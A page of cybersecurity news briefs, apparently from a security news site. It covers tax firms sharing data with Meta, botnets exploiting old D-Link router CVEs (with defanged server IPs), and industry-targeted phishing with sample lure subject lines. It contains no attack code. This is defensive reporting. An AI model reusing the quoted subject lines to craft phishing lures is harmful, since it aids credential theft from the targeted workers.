3 Tax Prep Firms Shared ‘Extraordinarily Sensitive’ Data About Taxpayers With Meta, Lawmakers Say
A group of congressional Democrats reported that three large tax preparation firms sent “extraordinarily sensitive” information on tens of millions of taxpayers to Facebook parent company Meta over the course of at least two years.
D-Link Routers Under Attack – Botnet Exploiting Devices to Gain Full Remote Control
A surge in cyberattacks leveraging legacy vulnerabilities in D-Link routers has been detected, with two botnets, FICORA and CAPSAICIN, actively exploiting these weaknesses.
Researchers at Fortinet’s FortiGuard Labs observed a spike in activity from these botnets during October and November 2024, highlighting the persistent threat posed by outdated and unpatched networking devices.
Exploitation of Decade-Old Vulnerabilities
The botnets exploit flaws in the Home Network Administration Protocol (HNAP) interface of D-Link routers, enabling remote attackers to execute malicious commands.
These vulnerabilities, tracked under CVE identifiers such as CVE-2015-2051, CVE-2019-10891, CVE-2022-37056, and CVE-2024-33112, were disclosed years ago but remain a significant risk due to the widespread use of unpatched devices.
Despite patches being available for many of these flaws, the continued reliance on legacy hardware has created an opportunity for cybercriminals to deploy malware at scale.
The FICORA botnet, a variant of the infamous Mirai malware, uses brute-force techniques to compromise devices and employs advanced encryption (ChaCha20) to conceal its configuration and command-and-control (C2) details. It is capable of launching distributed denial-of-service (DDoS) attacks using multiple protocols, including UDP and TCP.
FICORA botnet
Meanwhile, the Kaiten-based CAPSAICIN botnet prioritizes rapid deployment and eliminates competing malware on infected devices to maintain control.
CAPSAICIN botnet
FortiGuard Labs identified that the FICORA botnet was propagated from servers located in the Netherlands (e.g., IPs 185[.]191[.]126[.]213 and 185[.]191[.]126[.]248). The attacks were global in nature, suggesting they were not targeted but opportunistic campaigns aimed at exploiting any vulnerable device.
Both botnets underscore the dangers posed by outdated network hardware. While the vulnerabilities have been known for years, many organizations have failed to implement patches or replace end-of-life devices. This negligence has allowed attackers to repeatedly exploit these weaknesses.
Experts strongly advise enterprises and individuals to take proactive measures to mitigate these risks:
Regular Updates: Ensure that all routers and network devices are running the latest firmware versions.
Device Replacement: Replace end-of-life (EOL) hardware that no longer receives security updates.
Network Monitoring: Implement comprehensive monitoring solutions to detect unusual traffic patterns indicative of botnet activity.
Access Restrictions: Disable remote management features unless absolutely necessary and use strong, unique passwords for device access.
Organizations must prioritize updating or replacing vulnerable devices to prevent becoming unwitting participants in botnet-driven cybercrime campaigns.
Investigate Real-World Malicious Links, Malware & Phishing Attacks With ANY.RUN – Try for Free
Top Five Industries Aggressively Targeted By Phishing Attacks
Phishing attacks continue to pose a significant threat to various industries, with cybercriminals employing sophisticated tactics to deceive recipients.
A recent analysis by Cofense Intelligence, covering data from Q3 2023 to Q3 2024, has identified the top five industries most targeted by phishing attacks using customized subject lines.
The top Targeted Industries that are aggressively targeted by attackers via Phishing attacks are:-
Finance and Insurance: This sector tops the list, accounting for 15.5% of all credential phishing emails with customized subjects. Attackers often mimic business communications such as invoices and forms requiring attention.
Manufacturing: Representing 11.3% of emails with subject redaction, this industry is particularly vulnerable due to its reliance on order and contract-based communications.
Mining, Quarrying, and Oil and Gas Extraction: This sector accounts for 10.3% of emails with customized subjects, often featuring proposals, invoices, and shared document notifications.
Health Care and Social Assistance: 8.2% of emails with subject redaction targeted this industry, typically using notification-based or document-related subjects.
Retail Trade: Comprising 7.4% of emails requiring subject redaction, this industry often receives phishing attempts related to sales, contracts, and urgent shipments.
Top five industries targeted by emails with customized subjects requiring redaction (Source – Cofense)
While the common tactics and trends observed by the security analysts at Cofense Intelligence are:-
Subject Customization: Threat actors frequently incorporate the recipient’s name, email address, phone number, or company name in the subject line to increase legitimacy.
Quarterly Fluctuations: Most industries experienced peak volumes of customized phishing emails in Q3 2023, with varying trends in subsequent quarters.
Attachment Types: The most common malicious file types attached to these emails are .HTM(L) (90.3%) and .DOC(X) (9.4%).
Free Webinar on Best Practices for API vulnerability & Penetration Testing: Free Registration
Technical Analysis
Here below we have mentioned the industry-specific examples:-
Finance and Insurance
” shared ‘Invoice20248904.pdf’ with you”
“Invoice from “
“ACH on 2024-06-28 For “
Manufacturing
“Proposals from “
“File Shared By “
“NEW P.O. # 94153 from “
Mining, Quarrying, and Oil and Gas Extraction
“Contract Proposal for service – “
“Document shared with you: #_Financ…..#88456.docx”
“FW: New Invoice Acknowledgement 6472749IK From “
Implementation of sophisticated techniques to safeguard customers’ personally identifiable information (PII) and proprietary company data while providing actionable intelligence is must.
As this approach allows for accurate threat analysis without compromising sensitive information.
Besides this, researchers urged organizations across these industries must remain vigilant and implement robust security measures to protect against these targeted attacks.